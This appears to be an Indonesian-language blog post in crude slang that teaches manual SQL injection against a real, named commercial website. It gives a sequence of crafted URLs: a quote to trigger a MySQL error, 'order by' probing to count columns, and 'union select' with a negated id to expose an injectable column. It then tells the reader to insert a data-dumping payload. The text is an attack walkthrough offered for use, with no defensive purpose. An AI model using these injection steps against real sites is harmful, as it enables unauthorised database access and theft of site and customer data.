Gua mau ngasih tutor sql i manual by KrisnaGanz anjink simak baik" ngentod untuk targetnya pake web ampas saja
http://www.tzamtzam.co.il/category-products.php?cat=21
Nah biar tau vuln / tidak kamu kasih tanda ( ' ) petik atas di belakang angka oke , kalo vuln bakal ada tulisan *You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1*
Kalo dah ketemu ,lu tinggal masukin +order+by+1--+- ,Jadinya :
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+1--+-
Lu terusin ampe error, jadinya :
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+1--+- => Ga error
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+2--+- => Ga error
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+3--+- => Ga error
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+4--+- => Ga error
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+5--+- => error
Sampai eror ya tod
Kalo error nya di angka lima lu masukin angka tebelnya sampe angka 4 tod sama *order+by* nya ganti jadi *union+select*, jadinya
http://www.tzamtzam.co.il/category-products.php?cat=21'+union+select+1,2,3,4--+- , Jangan lupa tambahin ( - ) belakang angka yang buat test vulnya , jadinya
http://www.tzamtzam.co.il/category-products.php?cat=-21'+union+select+1,2,3,4--+- , Ok
Nah ntar kan muncul angka togelnya tuh semisal angka togelnya = 2 nah lu masukin dios lu Ok
Paham ? Paham gak paham semoga bisa di pahami gayn :D
Tidak ada komentar:
Posting Komentar